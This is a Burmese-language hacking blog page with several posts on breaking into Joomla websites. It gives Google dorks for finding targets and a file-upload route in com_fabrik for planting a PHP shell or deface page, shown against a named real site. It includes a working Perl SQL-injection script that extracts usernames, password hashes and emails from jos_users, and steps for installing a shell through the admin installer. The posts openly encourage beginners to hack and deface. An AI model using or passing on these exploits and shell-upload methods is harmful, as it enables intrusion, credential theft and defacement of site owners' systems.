Joomla Component com_fabrik File Upload Vulnerability

Joomla Component com_fabrik File Upload Vulnerability

Joomla Hacking ေနာက္တနည္းေပါ့ ~ :D Joomla Hacking ေတြအမ်ားျကီးရွိပါတယ္.. ရွာျကည့္ေပါ့ exploit ေတြမွာ .. :D ခုဟာက ဒီထဲက တနည္းပါ ..

 Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik

ဒါကို Google ထဲမွာ၇ွာျပီး Vulnerability ျဖစ္တဲ့ link ေတြ က်လာပါလိမ့္မယ္.. ဒီထဲက တခု ေရြးလိုက္ပါ ..

ဥပမာ => http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85

ဒါဆို .. သူ ့အေနာက္ကေနျပီး Vulnerable Path လုိက္ေပးပါ ..

Coad : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

E.g => http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 

ဒါဆို ေအာက္ကျပထားတဲ့ ပံုစံအတိုင္းေလးေပၚလာပါလိမ့္မယ္..

(မေပၚတဲ့ဟာေတြ၇ွိပါတယ္ ။ မေပၚ၇င္ Next One ေပါ့) :P

ေပၚလာလို ့ရွိရင္ ကိုယ့္ File Upload လုပ္ေပးပါ ..
ဥပမာ => (liT2le.php , mhudeface.html)

အားလံုးျပီးျပီဆို ကုိယ့္ Shell ကိုျပန္ျကည့္ရေအာင္ >>  http://www.liT2le_uNkn0w/media/yourshell.php

Continue Reading

exploit [joomla] com_huruhelpdesk

Code:

Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"author :  devil-zone.net
greet is to : devil-zone.net  all members 
vel = sqlI  

Code:

#!/usr/bin/perl
#greet is to Evil-Dzsystem("clear");
print "***************************************\n";
print "         Good Luck & Hafe Fun         *\n";
print "       Coded by devil-zone forum      *\n"; 
print "***************************************\n\n";
use LWP::UserAgent;
print "Target page [ex: HosT] --> ";chomp(my $target=<STDIN> );$column_name="concat(username,0x3a,password,0x3a,mail)";$table_name="jos_users";$prm="-1/**/union/**/select/**/";$start= LWP::UserAgent->new() or die "[!] Error while processing";$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";$ok= $start->request(HTTP::Request->new(GET=>$website));$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";sleep 1;
}
else
{
print "No password found :(\n";
}  

credit : devil-zone

Code:

- dork နဲ ့ရွာ 
- perl code ေတြကို xxx.pl နဲ ့ desktop မွာ save
- cmd ဖြင့္
- cd desktop
- perl xxx.pl

Copy From >>. . >>BiG BOSS ( MHu - Team )

Continue Reading

How To Upload Shell In Joomla

ကၽြန္ေတာ္ ဒါကို ဒီမွာလဲ တင္ဖူးပါတယ္ ကၽြန္ေတာ့္ဆိုဒ္မွာလဲ တင္ဖူးပါတယ္ ကၽြန္ေတာ့္ ဆိုဒ္က Back Up လုပ္ထားပါတယ္ Host Ban ခံထိလို႕ ျပန္မလုပ္ရေသးတာပါ အခ်ိန္တခုေတာ့ ျပန္လုပ္ပါဦးမယ္ မေရးပဲ မေနႏိုင္လို႕ပါ

ကဲကဲ ဖတ္မယ္ေနာ္ ေရးရတာကြန္မေကာင္းေတာ့ အားၾကီးစိတ္ဆိုးတယ္ဗ် ကဲ အရင္ဆုံး www.site.com/administrator ကိုသြားလိုက္ပါ ကဲေရာက္ျပီ မေရာက္လဲ ေရာက္ေအာင္သြားလိုက္ေနာ္ ေအာက္မွာပုံ ျပထားတယ္

Click this bar to view the original image of 1024x575px.

အဲဒါက ေရာက္သြားတဲ့ပုံပါ ေရာက္ျပီဆိုရင္ ကိုယ့္ ရွိတာေလးနဲ႕ ၀င္လိုက္ပါ Admin info ေနာ္ :p ျပီးရင္

Click this bar to view the original image of 1024x575px.

ကိုသြားလိုက္ပါ လင့္နဲ႕သြားခ်င္ရင္ေတာ့ http://www.site.com/administrator/in...=com_installer ေပါ့ဗ်ာ ေရာက္ျပီဆိုရင္ ဆက္ဖို႕ အတြက္ software လို႕ေျပာရမယ္ထင္တယ္ ထားလိုက္ပါ မသိဘူးလို႕

http://www.mediafire.com/?3e22cmam007nbae ေဒါင္းလိုက္ပါ ျပီးရင္ Browse ဆိုတာရွိတယ္ အဲဒါကိုႏွိပ္လိုက္ျပီးေတာ့ ေဒါင္းထားတဲ့ ေနရာ သို႕မဟုတ္ ကိုယ္ သိမ္းထားတဲ့ ေနရာမွာ သြားလိုက္ပါ ျပီးရင္ Upload & Install လုပ္လိုက္ပါ

Click this bar to view the original image of 1024x575px.

အဲလိုေလးေပါ့ဗ်ာ ကၽြန္ေတာ္ tut ေရးတုန္းက ႏွစ္ခါတင္မိလို႕ပါ ကဲ ဆက္မယ္ေနာ္ Imstalling Component Was Successful ဆိုတာေပၚလာရင္ ျဖစ္ျပီဗ်ာ ျပီးရင္ေတာ့

Click this bar to view the original image of 1024x575px.

ပုံထဲကလိုပဲ ရျပီေပါ့ဗ်ာ လမ္းေၾကာင္းကေတာ့ http://www.site.com//components/com_...bufacebook.php အဲလိုအဲလိုေပါ့ဗ်ာ ကဲ ေရးတာေတာ့ေရးျပီးသြားပါျပီ .. 

Copy From > ဒီ ပိုစ္ေလးက က်ြန္ေတာ့္ br0 > Kiddo ေ၇းထားတဲ့ Post ပါ ... :)

Continue Reading

Joomla SQL injection ထိုးနည္း

ဒီနည္းက Joomla ကိုဟက္ခ်င္တဲ့ဘလူေတြအတြက္ပါ.. ဘာမွမခက္ပါဘူး SQL ထုိးျပီးဟက္လိုက္၇ံုပါဘဲ. . . . ကဲ့ စမယ္ >
Google dork       : inurl:"index.php?option=com_filecabinet"
ရွာလိုက္ပါ... ေသာင္းနဲ႔ခ်ီရွာလို႔မကုန္ႏိုင္ေအာင္ေတြ႔လိမ့္မယ္ .. ဒီထဲက ကံစမ္းမဲႏွိဳပ္လိုက္ပါ ... :)
ျပီး၇င္ sql ေပါက္မေပါက္စစ္.. ေပါက္၇င္ >> :D
ေနာက္ျပီး Beginner ေတြ Joomla ဟက္မ်ားျကတယ္.. ဟုတ္တယ္. ဟက္ပါ.. ဟက္ကင္းမွာ Joomla ကအလြယ္ဆံုးဘဲ >> Shell တင္တာတို ့ Deface ကုိ စပယ္ရွယ္ တင္လို ့ရျပီေလ... :D

က်ြန္ေတာ္တခုေျပာခ်င္တာ "ကြ်န္ေတာ္ဟက္ကာမဟုတ္ပါဘူး ။ သူမ်ားကုိမထိခိုက္ပါနဲ႔ .. " 
ေနာက္တခု က Hacking မွာ အလြယ္ဆံုး IIS အေျကာင္းေ၇းေပးပါဦးမယ္.. :)  Soon ^_^

Continue Reading